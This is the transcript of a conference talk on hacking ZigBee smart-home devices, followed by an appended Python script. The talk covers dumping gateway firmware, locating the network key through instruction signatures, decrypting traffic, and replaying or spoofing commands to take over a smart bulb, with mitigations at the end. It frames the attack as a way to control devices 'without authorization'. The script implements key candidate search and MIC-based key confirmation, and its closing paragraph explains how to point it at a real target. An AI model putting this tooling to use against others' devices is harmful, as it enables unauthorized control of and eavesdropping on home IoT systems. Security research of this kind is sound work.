So today I will introduce to you guys how to hack a ZigBee device, and I think you guys are really tired, so I will make this quick, yeah. And well, in the speaker room somebody invited me to drink beer, so I'm a little bit high. Yeah. So I'm from the Qihoo company and the Unicorn Team, and actually we got three topics at this DEF CON, so really cool. The Unicorn Team focuses on hardware and radio security research. We have a lot of brilliant people, and we focus on anything that uses radio technology, from small things like RFID, NFC and WSN, something like that, to GPS and UAVs, such as drones; we hacked them and made them land in, you know, Beijing, or in America, such as at the White House, yeah. So during the research we made a lot of products and we sell them through a vendor; well, actually they sold out, so maybe you guys couldn't buy one. Well, let's just pass this page.

So why is this talk relevant to you? Maybe you guys are hackers and you might be able to control your ZigBee devices without authorization, and this talk will teach you how to hack them, such as your smoke sensor or your HVAC system. Well, if you control them, yours or not, you can know everything.

So what is ZigBee? ZigBee is the only global wireless standard that provides the foundation of the Internet of Things by enabling simple and smart objects to work together and improve comfort and efficiency in your everyday life. So maybe you guys use some IoT devices, and if you disassemble one you will find, oh, this is a ZigBee chip. So it's just a wireless language that everyday devices use to connect to one another, and in fact ZigBee may be working in your home right now. So maybe someone bought a smoke alarm; well, if you disassemble it, you might find one. So, blah, blah, blah. Yeah. I suppose that maybe somebody doesn't know what ZigBee is, so I introduced it.
So ZigBee is widely used in the Internet of Things, and it is adopted in applications that require low power consumption and a flexible network topology. So this is ZigBee's network: you've got a star, you've got a mesh and you've got a tree, and they're very different; we will introduce them later.

So the most important thing in ZigBee is the stack. So what is the stack? It's a specification, and the implementation of ZigBee is a stack from Texas Instruments based on the CC2530, which is an IEEE 802.15.4 embedded chip. Well, in other words, the ZigBee standard is written in English while the ZigBee stack is written in code. So here is the chip, and you can buy it from Texas Instruments; well, you can actually get it free online. So actually a lot of people have researched the security problems in ZigBee and they have done a lot of things; what I do is based on them. So thank you.

ZigBee security is based on symmetric keys: both the originator and the recipient of a protected transmission need to share the same key, with just a simple key exchange. So if you guys want to know more details, you can just download the document and do your research on it. So here is the key distribution: you can pre-install it, you can transport it, you can establish it. Well, there are three key types: the master key, the link key and the network key.

So hacking ZigBee step by step, here is what I want to say and what I want to teach you guys. And you know, here is the map of how ZigBee transfers information from one node to another. I think I'll share with you my simple premise. The following is the diagram, yeah. It's a smart bulb system; well, that's what the vendor calls it, but the audience will soon see that it's not that smart. Yeah, we borrowed it from the Internet. So here are the three normal control flows. Well, your phone connects to the IoT gateway and the gateway connects to the bulb.
Or your phone connects to the wireless router, the router connects to the IoT gateway, and that connects to the bulb. Or the phone just uses 4G or 3G or 2G, the Internet, and connects to the server, which connects to the wireless router, then the IoT gateway, then our target. So what we want is to directly control the bulb with our own ZigBee node: just a ZigBee node to the bulb. So that's how we hack it.

So the whole transmission is encrypted, so what we do is try to find the encryption key in the firmware. Yeah, actually, if you want to find it, the first thing you need to do is to dump the firmware. So the keys are stored in every node in the network, and as the firmware is harder to disassemble, we chose to extract the key from the gateway. So here is the light; I tried to disassemble it, I cut it, well, actually, finally I used a hammer to smash it. So I said, wow, this is a chip. Well, it doesn't work, it's broken. Yeah, that's my mistake, and I only had one of them. So before I smashed the ZigBee bulb, yeah, I tried to disassemble the gateway.

So we disassembled the gateway and we tried to dump the firmware. Okay, as the red arrow indicates, the debug interface is right here. So we soldered on a few wires, connected our debugger, and used the TI SmartRF Flash Programmer to dump the firmware. So if you guys want to dump the firmware from your device, this debug port is necessary. Okay, here is a screenshot of it; it's the programmer software. Well, we got the firmware. So there's a lot of, you know, many things in it. So what should we do? Well, if you just try to find the key in it, well, it's like trying to find your wedding ring in this garbage. So here is the way I tried to find the encryption key: first, we set the key's distinct signature, then search the firmware and see if we can discover something interesting.
So as the keys are used to encrypt the packets, why don't we find the instructions that manipulate the keys? So let's try to reverse it. So we found that the instructions that load the key have a relatively fixed part, shown in the next slide, and therefore the four consecutive MOV instructions could be used as a signature for the address of the key. So here are the most important instructions; I don't know if you guys can see them. So if you can't see them clearly, maybe you can download the slides. Okay. So in this red section, yeah, you can see it: you can see the structures and the hex values, and that's the flow I used to find the key. And actually, there are two keys, the stored key and the exchanged key. So if you guys want to hack it, you need to find the two keys to do the decryption. So we use this as a signature. And so in the upper right corner are the instructions that manipulate the network key, 0x31 and 0xAD; that's the memory address that stores the key. And likewise in the lower left corner. So in the upper right corner are the instructions that manipulate the network key, as shown. Oh, okay, this is really messy; something is going wrong on my laptop, I'm sorry. Yeah, that's the right thing, yeah, it just jumped.

Yeah. So then we use the four consecutive MOV instructions, the corresponding machine code and operands, these four values, as a signature to search through the firmware for the address of the keys. So you guys can know where the keys are used, how to find them and how to decrypt. Yeah, that's the screenshot of this; it shows the possible addresses of the keys. So we will verify whether these keys are the ones we want. So in order to verify this, we use the MIC, the, you know, message integrity check, contained in the packet, and if the deciphered packet passes the MIC check, yeah, we consider that we found the right key.
So you can just write a simple script to verify it and, you know, put in all the keys we found and check them one by one. Well, bingo, that's it. So that's the sniffer we used to capture the packets. Yeah, we bought it and we changed a few things. So the following screenshot shows the process of a new node joining the network, and the figure is quite self-explanatory: the network key is sent from the coordinator to the joining device in plain text, and after receiving the network key, the communication is immediately encrypted. So if it is encrypted, we can use the key that we found to decrypt it. Yeah, here is a screenshot of us doing this.

So I want to say that after we found the key, we could do some data mining to find the user's habits, because that could be a bit of a factor. But the following are some very, very practical attacks that we can perform: well, we can analyze the deciphered data, we can replay and spoof, we can intercept, yeah, and we can just do a disassociation attack.

So when we analyze the deciphered data: after we have deciphered the data, in order to take control of the target device we have to analyze the application-level data, and the result is as follows. So you can see, if you want to control this, how, you know, the light can be turned a different color; here is how you can control it. So the payload is 10 bytes in length, with the last byte being the XOR checksum of the foregoing bytes, and byte 1 and byte 2 are the ID of the target device. Well, in our case, this is a bulb, so we can control this bulb from our own node. Well, this is the device that we use; well, it's actually built by ourselves, we just, you know, used the Eagle software to draw it and we printed it out. So we can replay and spoof.
So if you guys know the key that we use to encrypt it, you can just generate the same packet to join the network and you can send exactly the same instructions to control this light. Yes, this light will think, wow, you guys are the gateway, so now you can control me. So this is the attack flow, and this sequence is pretty hard. Yeah. So you can see that the NWK sends instructions to the MAC and gets returns. Yeah. So now you just know the sequence, and you can just generate exactly the same sequence to control it.

So how do we protect, or just, you know, prevent our device from being hacked this way? So you know that if you just store your encryption keys in your firmware, well, it's not safe, so you can store a hash of the encryption keys instead of the plain text. And, you know, don't use OTA, over-the-air key provisioning; use a pre-installed key instead. So blow the fuse to prevent the firmware from being dumped, use secure boot, and use special protections; basically, you guys don't have to leave a debug port on it. So every hacker thinks, wow, there's something here, wow, you can hack it. So don't leave it. And employ some lightweight encryption on the application data to make the analysis of the application data hard after key compromise. So here you are.

Actually, I'd like to say something else. Actually, these slides, this presentation, is not mine, it's my colleague's, and well, actually, unfortunately, his visa was rejected by the VO, so he can't make it. So I just replace him, and, well, actually, I'm not familiar with his work. I just always see his laptop and him doing something else. Well, actually, I don't know, wow, what are you guys doing?
Yeah. So he sent me these slides and I said, oh, no, I can't replace you; you can speak for yourself. Actually, I don't know what you are doing, so how do I replace you? Yeah. So I'm really, really sorry about that. Yeah, yeah. So, actually, I already did my own presentation yesterday; it's about the femtocell. Yeah. Actually, I'm familiar with my work, not his. Yeah. So, actually, here is, you know, the work of my colleague, a former colleague who helped him a lot. And, well, actually, you know, if you guys want to know more details, you can contact him on Twitter or by email, that's okay. So, I'm really sorry about him. I think this weekend I should ask him, hey, can you invite me to lunch? And then, you know, I did a lot. Yeah. I'm very nervous, because this is my work. Yeah, I'm sorry. Yeah. So, thank you. So if you guys have got a question, I think I can answer. I'm sorry. Yeah. Thank you. I appreciate it.
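The key-recovery procedure the talk walks through (signature search in the dumped firmware for candidate key addresses, then confirming a candidate by checking the MIC of a sniffed frame), as an added example that is not the speakers' or Qihoo 360 Unicorn Team's code. The 8051 key-load signature, the flat dump layout (file offset equal to code address), the 8-byte NWK header, the firmware image and the captured frame are all assumptions constructed for the demo; the real signature has to come from disassembling the dump, as the slides show. AES-CCM* comes from the `cryptography` library, with pycryptodome as a fallback.

```python
# Added example, not the talk's or Qihoo 360 Unicorn Team's code. Assumptions: a
# hypothetical 8051 key-load signature, flat dump (offset == code address), an
# 8-byte NWK header, and a constructed firmware image and sniffed frame.
import functools
try:  # AES-CCM from whichever library is installed
    from cryptography.hazmat.primitives.ciphers.aead import AESCCM
    from cryptography.exceptions import InvalidTag
    def ccm_encrypt(key, nonce, aad, pt):
        return AESCCM(key, tag_length=4).encrypt(nonce, pt, aad)
    def ccm_decrypt(key, nonce, aad, ct_mic):
        try:
            return AESCCM(key, tag_length=4).decrypt(nonce, ct_mic, aad)
        except InvalidTag:
            return None
except ImportError:
    from Crypto.Cipher import AES  # pycryptodome fallback
    def ccm_encrypt(key, nonce, aad, pt):
        c = AES.new(key, AES.MODE_CCM, nonce=nonce, mac_len=4)
        c.update(aad)
        ct, mic = c.encrypt_and_digest(pt)
        return ct + mic
    def ccm_decrypt(key, nonce, aad, ct_mic):
        c = AES.new(key, AES.MODE_CCM, nonce=nonce, mac_len=4)
        c.update(aad)
        try:
            return c.decrypt_and_verify(ct_mic[:-4], ct_mic[-4:])
        except ValueError:
            return None

# Step 1: key candidates from the dump. Hypothetical 8051 key-copy prologue used
# as the signature (None = wildcard operand): MOV DPTR,#addr (0x90 hi lo);
# MOV R7,#16 (0x7F 0x10); MOVX A,@DPTR (0xE0); INC DPTR (0xA3).
KEY_LOAD_SIG = (0x90, None, None, 0x7F, 0x10, 0xE0, 0xA3)

def find_key_candidates(firmware, sig=KEY_LOAD_SIG, key_len=16):
    """Return {address: 16-byte blob} for every signature hit in the image."""
    hits = {}
    for i in range(len(firmware) - len(sig) + 1):
        if all(s is None or s == firmware[i + j] for j, s in enumerate(sig)):
            addr = (firmware[i + 1] << 8) | firmware[i + 2]  # MOV DPTR operand, big-endian
            blob = firmware[addr:addr + key_len]
            if len(blob) == key_len and len(set(blob)) > 1:  # skip erased/zeroed regions
                hits[addr] = blob
    return hits

# Step 2: confirm a candidate with the MIC of a secured NWK frame.
NWK_HDR_LEN = 8          # fc(2) dst(2) src(2) radius(1) seq(1); no extended addresses
AUX_LEN = 14             # sec ctrl(1) frame counter(4) ext source(8) key seq(1)
LEVEL_ENC_MIC_32 = 0x05  # ZigBee default security level: AES-CCM* with a 4-byte MIC

def _nonce_and_aad(hdr, aux):
    # The level bits are zeroed on the air; the receiver restores them before CCM*.
    aux = bytes([(aux[0] & ~0x07) | LEVEL_ENC_MIC_32]) + aux[1:]
    nonce = aux[5:13] + aux[1:5] + aux[:1]  # ext source || frame counter || sec ctrl
    return nonce, hdr + aux

def nwk_secure(key, ext_src, frame_counter, hdr, payload):
    """Build hdr || aux || ciphertext || MIC the way a coordinator would send it."""
    aux = bytes([0x28]) + frame_counter.to_bytes(4, "little") + ext_src + b"\x00"
    nonce, aad = _nonce_and_aad(hdr, aux)
    return hdr + aux + ccm_encrypt(key, nonce, aad, payload)

def try_candidates(frame, candidates):
    """Return (address, key, plaintext) of the first candidate whose MIC verifies."""
    hdr, aux = frame[:NWK_HDR_LEN], frame[NWK_HDR_LEN:NWK_HDR_LEN + AUX_LEN]
    nonce, aad = _nonce_and_aad(hdr, aux)
    for addr, key in sorted(candidates.items()):
        pt = ccm_decrypt(key, nonce, aad, frame[NWK_HDR_LEN + AUX_LEN:])
        if pt is not None:
            return addr, key, pt
    return None

def xor_checksum(data):
    """Last byte of the talk's 10-byte bulb command: XOR of the preceding bytes."""
    return functools.reduce(lambda a, b: a ^ b, data, 0)

# Constructed data: none of these values come from a real device.
NETWORK_KEY = bytes(range(0x10, 0x20))
DECOY_KEY = bytes([0xAA] * 8 + [0x55] * 8)
EXT_SRC = bytes.fromhex("0807060504030201")    # coordinator IEEE address, little-endian
NWK_HDR = bytes.fromhex("0812000034121e07")     # data frame, security + ext-source bits set
APP_CMD = bytes.fromhex("010102ff0000640000")   # 9 command bytes, checksum appended below

def build_firmware():
    """Filler plus a decoy key, the network key and an erased region, each with a prologue."""
    img = bytearray((i * 37 + 11) & 0xFF for i in range(0x400))
    img[0x300:0x310] = DECOY_KEY      # tried first and rejected by the MIC check
    img[0x340:0x350] = NETWORK_KEY
    img[0x380:0x390] = bytes(16)      # erased flash, filtered by find_key_candidates
    for off, addr in ((0x100, 0x300), (0x120, 0x340), (0x140, 0x380)):
        img[off:off + 7] = bytes([0x90, addr >> 8, addr & 0xFF, 0x7F, 0x10, 0xE0, 0xA3])
    return bytes(img)

FIRMWARE = build_firmware()
PAYLOAD = APP_CMD + bytes([xor_checksum(APP_CMD)])
CAPTURED_FRAME = nwk_secure(NETWORK_KEY, EXT_SRC, 0xA5, NWK_HDR, PAYLOAD)

def recover_network_key(frame=CAPTURED_FRAME, firmware=FIRMWARE):
    return try_candidates(frame, find_key_candidates(firmware))
```

Against a real target you would replace `FIRMWARE` with the SmartRF dump, `CAPTURED_FRAME` with the NWK frame bytes the sniffer gives you (the length of the NWK header depends on its frame-control bits, so parse it rather than hard-coding 8), and `KEY_LOAD_SIG` with the opcode bytes taken from the disassembly. The MIC check is what turns a list of look-alike 16-byte blobs into a single confirmed key, and the same `try_candidates` loop is all that is needed to re-verify after a key rotation.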